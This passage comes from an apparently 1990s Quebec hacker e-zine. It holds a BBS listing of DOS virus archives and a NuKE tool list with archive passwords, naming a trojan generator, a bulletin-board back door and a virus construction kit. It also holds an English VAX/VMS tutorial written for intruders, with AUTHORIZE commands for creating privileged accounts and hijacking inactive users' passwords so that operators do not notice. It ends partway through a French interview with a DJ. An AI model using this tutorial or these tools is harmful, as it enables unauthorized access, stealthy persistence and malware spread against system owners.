DIR .ZIP 0 50 DIR Virus [DIR]
DIRII .ZIP 1 50 Dir-2/FAT Virus [D2]
DIRR .ZIP 3 50 DIR Virus
DISKKILL.ZIP 0 50 Diskkiller Virus
DODO .ZIP 0 50 Dodo (birdie) Virus [Dod]
DODO-PIG.ZIP 0 50 Dodo-Pig (Dodo-407) [Dod]
DOMEVIR .ZIP 29 50 DOME Virus With Sources
DONOTH-B.ZIP 1 50 Do Nothing - B Virus [Not]
DONOTHIN.ZIP 0 50 Do Nothing Virus [Nothing]
DONTELLO.ZIP 1 50 Donatello Virus [VCL][Con]
DOOMII .ZIP 1 50 Doom ][ Virus [Dm2]
DOOMSDAY.ZIP 4 50 Doomsday Virus (Null/Scion) [Nl]
DOTEATER.ZIP 1 50 DotEater Virus (Nina) [Nina]
DOTKILL .ZIP 1 50 Dot Killer Virus [Dot]
DR20 .ZIP 3 50 Data Rape 2.0 Virus
DR22 .ZIP 6 50 Data Rape 2.2 Virus [Su2]
DR23 .ZIP 2 50 Data Rape 2.3 Virus
DRAPE-21.ZIP 0 50 Datarape v2.1
DROPPER2.ZIP 1 50 Dropper 2 Virus [Dr2]
DROPSY .ZIP 3 50 Dropsy Virus (Timid)
DRQUMAK .ZIP 1 50 Dr. Qumak Virus [Lisbon]
DUMB .ZIP 8 50 Dumb Virus
DURANGO .ZIP 6 50 Durango Virus (Viper/Leprosy) [Vip]
DURBAN .ZIP 0 50 Durban Virus [Arma]
DUTCH555.ZIP 0 50 Dutch 555 Virus [Dt]
EAR .ZIP 2 50 Ear Virus [Ear]
EARNESTO.ZIP 2 50 Earnesto Virus [UnScannable]
EBV .ZIP 0 50 Eternal Blaze Virus
EDV .ZIP 2 50 EDV Virus
ELVIS .ZIP 1 50 Elvis Virus (Phalcon)
EMF .ZIP 0 50 EMF Virus [Emf]
EMFII .ZIP 0 50 EMF ][ Virus [Sr]
ENCROAC2.ZIP 3 50 ENCROACHER 2-MtE, anti-CPAV, dirties files after din
ENCROACH.ZIP 3 50 ENCROACHER - MtE-loaded anti-CPAV virus
ENEMY .ZIP 1 50 Enemy Virus (Scr-2) [696]
ENGLAND .ZIP 0 50 England Virus (334) [334]
ENIGMA .ZIP 1 50 Enigma Virus [Enigma]
ERASMUS .ZIP 1 50 Erasmus Virus (Murphy) [Murphy]
EUROPE92.ZIP 1 50 Europe 92 Virus [E-92]
EVIL .ZIP 2 50 Evil Virus [Plr]
EVIL-D .ZIP 2 50 Evil-D Virus [Plr]
EXPLODE .ARJ 1 50 Explode Virus (New Trivial)
EXTERM .ZIP 0 50 Exterminator Virus [IB]
FAKOFILE.ZIP 55 50 Dropper for VCL-Viriant [OW]
FAMILY-N.ARJ 1 50 Family-N Virus [FN]
FAMILY-Q.ARJ 0 50 Family-Q Virus [FQ]
FATHERCH.ZIP 1 50 Father Christmas Virus [GenF][Lisbon]
FEAR .ZIP 2 50 Fear Virus [Mut]
FELLOW .ZIP 3 50 Fellowship Virus [fellow]
FEXE10ER.ZIP 2 50 FEXE or 10ER virus - looks like a research virus
FGT .ZIP 1 50 FGT Virus [FN]
FIL .ZIP 2 50 Fil Virus [Fil]
FILLER .ZIP 3 50 Filler Virus [Filler]
FINGER .ZIP 1 50 Finger Virus [Murphy]
FINN-709.ZIP 1 50 Finnish Virus (CSL Related) [CSL]
FIRE-V .ZIP 3 50 Fire Virus
FISH .ZIP 4 50 Fish Virus [Fish]
FISH2 .ZIP 3 50 Fish ][ Virus [Fish]
FLASH .ZIP 2 50 Flash Virus [Flash]
FLEXITUP.ZIP 1 50 Flex Virus
FLIP .ZIP 52 50 Flip Virus [Flip]
FLIP2143.ZIP 5 50 Flip-2143 Virus [Flip]
FLIP2343.ZIP 2 50 Flip-2343 Virus [Flip]
FONER .ZIP 23 50 Foner Boot Virus
FORM .ZIP 126 50 Form Virus - TD0
FRANCE .ZIP 1 50 France Virus (ZK900) [Z900]
FREEW692.ZIP 1 50 FreeW Virus (Bob Viraint) [Bob]
FRERE .ZIP 3 50 Frere Virus [Mule][Jeru]
FREREJ .ZIP 1 50 Frere Jacques Virus [Mule][Jeru]
FRIDAY .ZIP 4 50 Friday Virus (AntiCad/Plastique) [Plq]
FRIENDS .ZIP 3 50 Friends Virus [ARCV] UnScaned COM
FRODO .ZIP 3 50 Frodo Virus (4096) [4096]
FROGS .ZIP 1 50 Frogs Virus [Frg]
FUCKYOU .ZIP 0 50 Fuck You Virus [FW]
FUMANCHU.ZIP 2 50 Fu Man Chu Virus [Fu]
FUNKYKEY.ZIP 17 50 FunkyKey Virus
FUTHARK .ZIP 2 50 Futhark Virus
FVHS-A .ZIP 2 50 FVHS-A Virus (modified Leprosy)
FVHS-B .ZIP 3 50 FVHS-B Virus (Modified Leprosy)
G2-70B .ZIP 47 50 P/S Mass code producer
GEE .ZIP 14 50 Gee Virus (number 1) [N1]
GEEK .ZIP 1 50 Geek Virus
GENERIC .ZIP 4 50 Family-Q Virus [FQ]
GENESIS .ZIP 18 50 Genesis Virus
GERGANA .ZIP 1 50 Gergana 182 Virus [Gerg]
GHOST .ZIP 2 50 Ghostballs Virus (Family Virus) [FM]
GIANTKLL.ZIP 6 50 Giant Kill Virus
GOBLIN .ZIP 3 50 Goblin Virus (Cracker) [CRJ]
GOOBER .ZIP 2 50 Goober Virus [Def] Define
GOOBER2 .ZIP 0 50 Goober II Virus (VCL) [Con] VCL 2
GOTCHA1 .ZIP 1 50 gotcha-1 (A-Generation) [Gtc]
GOTCHA4 .ZIP 1 50 Gotcha-4 (E Generation) [Gtc]
GREEMLIN.ZIP 2 50 Diamond Greemlin Virus (Alfa) [Alf]
GREEN .ZIP 1 50 Green Joker Virus [GRE]
GREETING.ZIP 2 50 Greetings Virus
GRITHER .ZIP 0 50 Grither Virus [GenF][Lisbon]
GRLINKS .ZIP 3 50 Jerusalem Groen Links Virus [Jeru]
GROUCH .ZIP 3 50 Grouch Virus (Timid Clone) [Tmd]
GROUCH-E.ZIP 2 50 Grouch-E Virus (Timid Clone) [Tmd]
GROUCH1 .ZIP 4 50 Grouch Virus (Timid Clone) [Tmd]
GRUNT-1 .ZIP 2 50 Grunt-1 Virus [Grt-1]
GRUNT2 .ZIP 2 50 Grunt-2 Virus UnScannable
GRUNT4 .ZIP 2 50 Grunt-4 Virus UnScanable
GUPPY .ZIP 1 50 Guppy Virus [Guppy]
HACKTIC .ZIP 1 50 Tic Virus (109) [109]
HAHA .ZIP 1 50 HaHa Virus [Sunday]
HAIFA .ZIP 5 50 Haifa Virus [Hf]
HALLOE .ZIP 5 50 Halloechen Virus [Hal]
HAPPY .ZIP 4 50 Happy New Year Virus [HNY][Vor]
HAPPY-N .ZIP 6 50 Happy N.Y Virus [HNY][Vor]
HARAKI2 .ZIP 3 50 Harakiri Virus
HARAKIRI.ZIP 6 50 Harakiri Virus
HBT .ZIP 0 50 HBT Virus
HEEVA .ZIP 52 50 Heeva Virus
HEHHEH .ZIP 2 50 Heh Heh Virus (Timid Clone) [F-Prot]
HERO .ZIP 0 50 Hero Virus [Hero]
HH&H .ZIP 3 50 HH&H Virus
HIDOS .ZIP 3 50 HiDos Virus [ARCV] UnScaned TSR-Boot
HIGHLAND.ZIP 3 50 HighLander Virus
HIV .ZIP 1 50 HiV Virus [Murphy]
HIV-B .ZIP 1 50 Hiv Strain B
HOLLAND .ZIP 1 50 Holland Girl Virus [Sylvia]
HORSE-3 .ZIP 1 50 Horse-3 Virus [Hrs]
HORSE-4 .ZIP 1 50 Horse-4 Virus [Hrs]
HORSE-8 .ZIP 2 50 Horse-8 Virus [Hrs]
HORSE2 .ZIP 1 50 Horse 2 Virus [Hrs]
HORSE5 .ZIP 1 50 Horse 5 Virus [Hrs]
HORSE6 .ZIP 1 50 Horse 6 Virus [Hrs]
HR .ZIP 2 50 Hellraiser/Skism 18 Virus
HUNGARY .ZIP 1 50 Hungary Virus [Hng]
HYBRYD .ZIP 1 50 Hybryd Virus [Hyb]
HYDRA-0 .ZIP 0 50 Hydra Strain 0 Virus [Pix]
HYDRA-1 .ZIP 0 50 Hydra Strain 1 Virus [Pix]
HYDRA-2 .ZIP 0 50 Hydra Strain 2 Virus [Pix]
HYDRA-3 .ZIP 0 50 Hydra Strain 3 Virus [Pix]
HYDRA-4 .ZIP 0 50 Hydra Strain 4 Virus [Pix]
HYDRA-5 .ZIP 0 50 Hydra Strain 5 Virus [Pix]
HYDRA-6 .ZIP 0 50 Hydra Strain 6 Virus [Pix]
HYDRA-7 .ZIP 0 50 Hydra Strain 7 Virus [Pix]
HYDRA-8 .ZIP 0 50 Hydra Strain 8 Virus [Pix]
HYMN .ZIP 1 50 Hymn Virus [Hymn]
HYMN2 .ZIP 2 50 Hymn ][ ( Sverdlov ) Virus [Sv]
ICE-3 .ZIP 1 50 Icelandic III
IGOR .ZIP 5 50 Igor Virus
INCOM .ZIP 1 50 Incom Virus [Inc]
INFINITI.ZIP 0 50 Infiniti Virus [GenF]
INSUFF3 .ZIP 7 50 InStuff-3 equiped with MTE [MTE][DAME]
INTRUDER.ZIP 1 50 Intruder
INVADER .ZIP 2 50 Invader Virus [Invader]
IRAQUI .ZIP 0 50 Iraqui Warrior Virus [Iwar]
ISRAELI .ZIP 2 50 Israeli Virus [Jeru]
ISRAELV .ZIP 0 50 Israel V Virus
IT-PEST .ZIP 1 50 Cemetery Virus (Murphy) [Murphy]
ITAVIR .ZIP 3 50 Itavir Virus
ITTI .ZIP 0 50 Itti-Bitti Virus, Strains A & B (NuKE)
J-INJECT.ZIP 8 50 Jerusalem Injector
J4JV120 .ZIP 10 50 Jump For Joy v1.2 Virus
JABERWOK.ZIP 2 50 Jabberwocky-812 Virus [Jab]
JASMINE .ZIP 1 50 Jasmine Virus (MSK Clone) [MSK]
JER-A204.ZIP 2 50 A-204 Virus (Jerusalem Varient) [Jeru]
JERPUERT.ZIP 2 50 Puerto Rico Virus (Jeru Viriant) [Jeru]
JERSPAIN.ZIP 1 50 Spanish Jerusalem Virus [Jeru]
JERSULEM.ZIP 1 50 Jerusalem Virus [Jeru]
JERU-A .ZIP 24 50 Jerusalem Virus Strain A [Jeru-A]
JERU-B .ZIP 1 50 Jerusalem Virus, Strain B [Jeru]
JERU-C .ZIP 2 50 Jerusalem Virus Strain C [Jeru]
JERU1735.ZIP 1 50 Jerusalem-1735
JERU3 .ZIP 9 50 Jerusalem 3 Virus [Jeru]
JERUB-3 .ZIP 1 50 Jerusalem Virus Stran B3 [Jeru]
JERUB-I1.ZIP 1 50 Jerusalem (sUMsDOS-var) [Jeru]
JERUB-I2.ZIP 3 50 Jerusalem B v2 Virus [Jeru]
JERUB204.ZIP 1 50 Jerusalem (A-204) [Jeru]
JFK .ZIP 11 50 JFK Virus (Frodo/4096) [4096]
JO .ZIP 3 50 Joanna Virus [ARCV] [Joa]
JOEXE .ZIP 2 50 Joanna Exersiser [ARCV] [Joa]
JOJO .ZIP 4 50 JoJo Virus [170x]
JOJO2 .ZIP 3 50 JoJo 2 Virus [170x]
JOKER-01.ZIP 7 50 Joker-1 Virus [Joker]
JOKER-02.ZIP 7 50 Joker-2 Virus [Joker]
JOSHI .ZIP 10 50 Joshi Virus ( Teledisk ) [Joshi]
JOSHIDRP.ZIP 12 50 Joshi Dropper [Drp]
JOSHI_A .ZIP 4 50 Joshi-A Virus
JO_V111 .ZIP 3 50 Joanna v1.1 Virus [ARCV] UnScaned TSR-COM
JULY13 .ZIP 1 50 July 13th Virus
JULY13 .ZIP 2 50 July The 13th Virus
JUNE16TH.ZIP 1 50 June 16th Virus [Jun16]
JUSTICE .ZIP 1 50 Justice Virus [Jus]
KAMASYA .ZIP 2 50 Kamasya Virus [Pest]
KAMIKAZE.ZIP 2 50 Kamikaze Virus [Kami]
KEMEROV .ZIP 0 50 Kemerovo 257-A Virus [Kem]
KENNEDY .ZIP 0 50 Dead Kennedy Virus [Tiny]
KEYDROP .ZIP 2 50 KeyDrop Virus [Drp]
KEYPRESS.ZIP 2 50 Keypress-1232
KIEV493 .ZIP 0 50 Kiev-493 Virus [Kiev]
KILROY .ZIP 0 50 Kilroy Virus
KINNNUKE.ZIP 6 50 Sam Kinnison Virus ( NuKE )
KKK .ZIP 6 50 Klu Klux Klan Virus
KODE4V11.ZIP 0 50 Kode 4 virus v1.1
KODE4V3 .ZIP 0 5 Kode 4 v3.0
KOREA .ZIP 4 50 Korea Virus (TDO) [Korea]
KUANG2 .ZIP 2 50 Kuang Grade Mark-11 Virus [Par]
KYLIE .ZIP 2 50 Kylie Virus (Jerusalem) [Jeru]
LABEL .ZIP 2 50 Label Virus [Label]
LATE .ZIP 1 50 Late Night Virus
LEECH .ZIP 1 50 Leech Virus [Leech]
LEHIGH .ZIP 16 50 LeHigh Virus (Original) [LeHigh]
LEHIGH2 .ZIP 23 50 Lehigh ][ Virus
LEPRO-C1.ZIP 1 50 Leprosy-C1 [Lep3]
LEPRO-C2.ZIP 1 50 Leprosy-C2 [Lep3]
LEPROSY .ZIP 8 50 Leprosy Virus [RMIT]
LEPROSYB.ZIP 12 50 Leprosy Virus, Strain B [LepB]
LEPROSYC.ZIP 1 50 Leprosy Strain C
LEPROSYD.ZIP 0 50 Leprosy Strain D
LIBERTY .ZIP 3 50 Liberty Virus [Liberty]
LIBERTY2.ZIP 3 50 Liberty-2 Virus [Liberty]
LIGHT .ZIP 0 50 Lightning Virus
LISBON .ZIP 0 50 Lisbon Virus [Lisbon]
LISBON2 .ZIP 0 50 Lisbon 2 Virus [GenF][Lisbon]
LOCK_UP .ZIP 0 50 Lock-Up Virus
LOVECHLD.ZIP 0 50 Love Child Virus [LC]
LOZ-1018.ZIP 1 50 Lozinsky 1018 Virus [Loz]
LOZ-1023.ZIP 1 50 Lozinsky 1023 Virus [Loz]
LOZINSKY.ZIP 2 50 Lozinsky Virus [Loz]
LUCIFER4.ZIP 1 50 Lucifer v4.0
LUCIFR61.ZIP 0 50 Lucifer v6.1
LYTHYUM .ARJ 1 50 Lythyum Virus
_16850 .ZIP 10 50 _16850 virus [C16]
------------ -------
508 files 2137088 bytes total

NukE produit aussi des programmes pour hackers et programmeurs de virii.
On trouve entre autres dans leur arsenal original:

[ NuKE Warez ] #7 <NR>
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Filename.Ext Bytes Description
-------- --- -------
-------------------------------------------------------
BYPASS2 .ZIP 6 5 By Pass Trojan (Back maker for TG & Renegard) COM2
HPBOOK .ZIP 78208 - TSR DATABASE - To Store H/P infos
NK-INFO1.ZIP 115712 NuKE Info-Journal #1
NK-INFO2.ZIP 79488 NuKE Info-Journal #2
:PW:514735
NK-INFO3.ZIP 142208 NuKE Info-Journal #3
:PW:POWER
NK-INFO4.ZIP 65152 NuKE Info-Journal #4
:PW:PARTY
NUKE-POX.ANS 2816 Special NuKE Pox v2.0 release ANSI from SSI & UPi!!
NUKECTY2.GIF 22144 VGA for [NuKE] "NuKE City" (320x200x256)
NUKECTY3.GIF 73984 VGA for [NuKE] "NuKE City" (640x480x256)
NUKETYM .ZIP 2 5 NuKE's complete Tymnet OD/NUAs listing v6.2
NUTILS20.ZIP 111872 NoWhere Man Utilities, Has V1.0 + new ones of v2.0
NWHRVC .ZIP 25472 Expansion Kit for V.C.L. (NoWhereMan)
TGBDR15 .ZIP 34688 Telegard Back Door
TROG-V15.ZIP 36352 Trojan Generator
VCL .ZIP 165376 Virus Construction Lab - By: Nowhere Man
:PW: Chiba City
:Must be installed in C:\VCL to work.
------------ -------
15 files 963200 bytes total
-= PAUSE =-


Avis … ceux qui se disent: "Hein? NuKE sortent des Warez? Je
pensais que c'‚tait un groupe H/P/C/A/V ?!?" Ben, faites le lien
entre les deux, pis ‡a ressemble … ‡a... Tout le monde a droit …
l'‚ducation...
C“t‚ Virus, il y en a environ 1000-1100... Mieux que le 200 avec qui
vous faites peur … votre grand-mŠre...

Concluons...

En r‚sum‚, les ‚valuateurs de NPC donnent deux pouces lev‚s au Cybernetic
Violence. On aime bien communiquer avec ce bab (WE'RE NOT WORTHY!).

Pas pire du tout... Un des meilleurs dans le genre au Qu‚bec... ou
ailleurs.

Pour toute question suppl‚mentaire, quelle qu'elle soit, vous pouvez
rejoindre un officier de Npc. Ils se feront surement un plaisir
de vous r‚pondre... Pour le Num‚ro, vous pouvez l'avoir sur
n'importe quel bon bbs supportant le Hack/Phreak (Workshop,
Screeming Revulsion, Coffin of Darkness)... Partant du
principe que beaucoup d'entre nous, Qu‚b‚cois, comptons nos
sous pour les Ld (Sauf en Outdial ou par Code), il est, comme
qui dirait, … port‚e de ligne... Et bien meilleur que
beaucoup de babs de pacotille aux Us... Bref: €a vaut le coup
d'appeler, surtout si vous trippez sur la programmation.

Dormez en paix; la guerre dans le monde c'est pas
pour tout de suite; Etc; Etc...



IN VINO VERITAS



ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ

NPC VOUS ENCOURAGE A NE PAS VOLER: BELL N'AIME PAS LA COMPETITION
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ



=Creating/Modifying Accounts on a VAX/VMS Operating System=
=by Subhuman Punisher=




The job of creating, modifying or deleting users is performed via
the image AUTHORIZE. This program should be found in the sys$system
directory. This job requires the SYSPRV privilege. To show the list
of all the privileges your account is set up for, type:

$ show proc/priv

If you have the SYSPRV privilege, you can go on and
add/modify/delete users. Typical accounts which have the SYSPRV
privilege are SYSTEM, and FIELD. If your account has the SETPRV
privilege, then you can add the SYSPRV privilege to your account by
typing:

$ set proc/priv=SYSPRV


Assuming you have hacked out an account with the required privilege,
then this is how you start up AUTHORIZE.

$ sd sys$system ; change to sys$system directory
$ run authorize ; self-explanatory


This will return you the User Authorization File prompt (UAF from
now on).

UAF>


The quick and dirty way to create a new user is:

UAF> add [username] /password=[desired_pwd]/priv=[wanted_privileges]


For example:

UAF> add subhuman /password=whatever/priv=setprv

would create a high-privileged user on a system. Of course, you
should avoid adding new accounts when possible. The best idea would
be to find an inactive user and to change his password to whatever
you want. This way, the system operator won't get suspicious. You
should also avoid granting all privileges to a particular user. This
is very easy to detect from the operator's side.


Here are the commands available from the AUTHORIZE program:

ADD | Add a new user. See online help for further information.
COPY | Allows you to copy any record in the UAF to a new user.
CREATE | Allows you to create either the RIGHTSLIST.DAT or NETUAF.DAT
| files if they don't already exist.
DEFAULT| Allows you to change any item in the DEFAULT record in SYSUAF.DAT
EXIT | Terminate authorize and go back to the VMS shell.
GRANT | Grants an identifier name to a user UIC
LIST | Makes a listing file (SYSUAF.LIS) which gives information
| on the records specified.
MODIFY | Allows you to modify an existing user. see below.
REMOVE | This allows you to delete an existing user record
RENAME | This allows you to change the username of a record
REVOKE | Revokes an identifier name from a username or UIC identifier
SHOW | Allows you to view the records in SYSUAF.DAT, RIGHTSLIST.DAT and
| NETUAF.DAT


The commands you will be using most from here are SHOW and MODIFY.
Show can be used to isolate INACTIVE accounts (based on last login),
failed login attempts etc. The MODIFY command will let you change
any characteristic in any of the records. Below I will give a short
discussion on some of the more important qualifiers that can be
specified. Note that exactly the same thing applies to the ADD
command:


/ACCESS -if the account is set up for no remote access or whatever, just
include this qualifier (no parameters) to gain FULL access.
/DEFPRIV -your default privileges. These are the privileges that are
active
upon login
/DIR -the directory assigned to you upon login. ie. SYS$LOGIN
/LGICMD -the file that is executed upon login. Normal setting would be
/LGICMD=login.com
/PASSWORD -guess what? your password!
/PRIORITY -CPU priority.
/PRIV -privileges. see below for a list of all privileges.
/PWDMIN -minimum password length
/UIC -User Identification Code. Format: [group,member]


On many systems you will find a file called ADDUSER.COM which allows
the system manager to create new users. It is a DCL file which
simplifies the task of creating new users by prompting you for all
the necessary parameters.


Below is a complete example of the command line. Just type HELP from
the UAF> prompt if you are stuck.

UAF> add DOEJ /own=John Doe /acco=john_doe /dir=SYS$LOGIN /uic=1,
34534,[privs] /passw=whatever

The items here are:

DOEJ -the name you will use on the system
John Doe -your actual name (of course you don't use your REAL name!)
john_doe -your account name, usually used for billing purposes
SYS$LOGIN -your login directory. Best to keep an existing one
1,34534 -your User Id Code. format: [group,member]
whatever -your account password.
[privs] -your account privileges. See below for a complete list of
all privileges available. SETPRV gives you manager access.
type SHOW PROC/PRIV from the DCL prompt ($) to show your
current privileges.




PRIVILEGE DESCRIPTION
-----------------------------------------------------------------------
---------
NONE no privilege at all


NORMAL PRIVS
------------
MOUNT Execute mount volume QIO
NETMBX Create network connections (*you need this to outdial!*)
TMPMBX Create temporary mailbox


GROUP PRIVS
-----------
GROUP Control processes in the same group
GRPPRV Group access through SYSTEM protection field


DEVOUR PRIVS
------------
ACNT Disable accounting
ALLSPOOL Allocate spooled devices
BUGCHK Make bugcheck error log entries
EXQUOTA Exceed disk quotas
GRPNAM Insert group logical names n the name table
PRMCEB Create/delete permanent common event flag clusters
PRMGBL Create permanent global sections
PRMMBX Create permanent mailboxes
SHMEM Create/delete structures in shared memory


SYSTEM PRIVS
------------
ALTPRI Set base priority higher that allotment
OPER Perform operator functions
PSWAPM Change process swap mode
WORLD Control any process
SECURITY Perform security related functions
SHARE Access devices allocated to other users
SYSLCK Lock system-wide resources


FILES PRIVS
-----------
DIAGNOSE Diagnose devices
SYSGBL Create system wide global sections
VOLPRO Override volume protection


ALL PRIVS
---------
BYPASS Disregard protection
CMEXEC Change to executive mode
CMKRNL Change to kernal mode
DETACH Create detached processes of arbitrary UIC
LOG_IO Issue logical I/O requests
PFNMAP Map to specific physical pages
PHY_IO Issue physical I/O requests
READALL Possess read access to everything
SETPRV *** ENABLE ALL PRIVILEGES!!! ***
SYSNAM Insert system logical names in the name table
SYSPRV Access objects through SYSTEM protection field. Great one.



==============
DCL : Digital Command Language
DEC : Digital Equipement Corporation
VAX : Virtual Access eXtension
VMS : Virtual Memory System
==============


=The end=



ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ

NOUS AVIONS JADIS UN MONOPOLE
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ



OU SONT PASSES LES VRAIS REBELLES?

par
BLITZKREIG



C'est le retour de la chronique des anars, les mecs. C'est le
territoire o— vivent les cascadeurs de l'existence, les cingl‚s du
d‚terminisme, les t‚m‚raires qui n'‚coutent que la seule voix de leur
conscience, celle qui dicte que le boutte du boutte dans la vie, mes fils,
c'est de TOUJOURS faire en sorte que l'on puisse se regarder dans le
miroir sans baisser les yeux, sans rougir de honte. Vivre sa vie sans
faire de compromis, c'est possible. Ceci n'est plus une chronique sur les
pionniers de l'underground au Qu‚bec, c'est maintenant une tribune pour
ceux qui ont compris le vrai sans de la vie. La r‚ponse, mes amis, c'est
de vivre sa vie sans l‚cher le cul d'un boss m‚prisant, en faisant un bras
d'honneur aux conventions et aux consid‚rations familiales. Moi, j'ai
trouv‚ des tas de mecs et de nanas pour qui le mot "compromis" n'existe
pas... C'est ces marginaux de la norme que j'ai d‚cid‚ de vous pr‚senter
ici, mois aprŠs mois. Bien s–r, il va y avoir des musiciens, des peintres,
des sculpteurs; des artistes, quoi! Par d‚finition, ˆtre un artiste, c'est
accepter de prendre des risques. C'est mˆme tout sauf un choix, prendre
des risques, pour ces gens-l…! Aller ‚tudier au conservatoire de musique
ou de th‚ƒtre, c'est comme acheter un billet de 6\49 avec ta vie:
seulement 10% des membres de l'Union des Artistes vivent au dessus du
seuil de pauvret‚. Les autres ont jou‚ le tout pour le tout... MAIS ILS
N'ONT PAS PERDU, les mecs! Ils peuvent encore se regarder dans le miroir
le matin, Dieu merci...

Comme on vient de le voir, vivre sans compromis est une seconde nature
pour la gent artistique. Mais il y a aussi des gens qui refusent une job
dans l'entreprise de papa, ou qui refusent de l‚cher les culs de ceux qui
dispensent avec parcimonie les emplois, g‚n‚ralement … ceux qui ont la
langue la plus brune... On peut aussi vivre sans compromis quand on est
acupuncteur, ou boucher, ou conducteur de poids-lourd, n'importe... La
plupart de nos lecteurs, nous le savons, fr‚quentent encore les
institutions d'enseignement qui se sp‚cialisent dans le lavage de cerveau:
"Il y a un avenir pour vous en technologie de la transformation du
minerai, jeune homme. La grappe industrielle n'est pas encore remplie..."
Plut“t que d'‚couter ces cons d'orienteurs, qui ne sont pas l… pour vous
aider, je vous le jure, mais bien plut“t pour aider la soci‚t‚ … remplir
les "cr‚neaux" vacants, pourquoi ne pas ‚couter la voix en dedans de vous?
Vous savez, celle qui vous dit: "Fais-toi plaisir, fais ce que tu as envie
de faire! Ne gƒches-pas ta vie … faire une job merdique pendant trente
ans, une job que tu vas ha‹r … chaque minute de ta vie! Fais ce que tu as
VRAIMENT envie de faire!"

Ce qui vous branche, ce qui vous ‚clate, va s–rement faire de vous des
gens plus ‚panouis que si vous vous destiniez seulement … trouver une job
o— on fait du cash... Pensez-y, les kids: vous avez le choix entre le
boulot-rouleau-compresseur, ou une vie sur le fil du rasoir, mais o— vous
serez encore capables de vivre avec vous mˆme et de vous aimer un peu,
bordel...

CASE IN POINT...

Notre rebelle, ce mois-ci, s'appelle Daniel Rochette. Non, ce n'est pas
un handle, c'est le vrai nom d'une vraie personne, en chair et en os, un
vrai rebelle qui a d‚cid‚ que personne n'avait le droit de d‚cider de la
conduite de sa vie, hormis lui... Daniel est disc-jockey de son ‚tat. Mais
pas N'IMPORTE

  
LEQUEL D.J.: c'est le meilleur! L'entrevue s'est d‚roul‚e
sur trois soirs: 15 heures d'entrevue, les mecs! ...Hummm... En fait, pour
ˆtre totalement honnˆte... J'ai une confession … vous faire... L'entrevue
proprement dite aurait pu se faire en une heure... mais je prenais
BEAUCOUP trop de plaisir … ‚couter tous les nouveaux groupes techno-rave
que ce maniaque de la musique affectionne, et je suis devenu de plus
complŠtement accro aux mixes GANTS que le sieur Rochette sait seul
concocter...

Blitz- T'as quoi comme ƒge, mon mec? Au look, comme ‡a, je te donne 24-25
ans...

Daniel- Ha ha! Non! Je suis n‚ le 25 juin 1957!

Blitz- Dans un milieu modeste d'o— tu t'es sorti … la force des poignets,
sans doute!

Daniel- Tu veux rigoler, Blitz! Je suis originaire de Sainte-Foy, d'un
quartier cossu de cette banlieue. Mon pŠre ‚tait propri‚taire des cuisines
Rochette. Tu connais? Je suis all‚ dans les collŠges priv‚s, et tout le
cirque. Je suis mˆme entr‚ dans la compagnie de mon pŠre, avec un titre
confortable et tout. Ca a dur‚ 4 ans. J'ai mˆme ‚t‚ vendeur de l'ann‚e...

Blitz- Wow! Que s'est-il pass‚? Tu t'es fait pincer … manger des cretons
en cachette, et tu as ‚t‚ renvoy‚?

Daniel- T'es un petit dr“le, toi! Je savais que c'‚tait pas moi, ce boulot
l…. Porter une cravate jusqu'… la fin de ma vie... J'ai tout laiss‚
derriŠre moi, pis j'ai d‚cid‚ que j'allais maintenant tenter de gagner ma
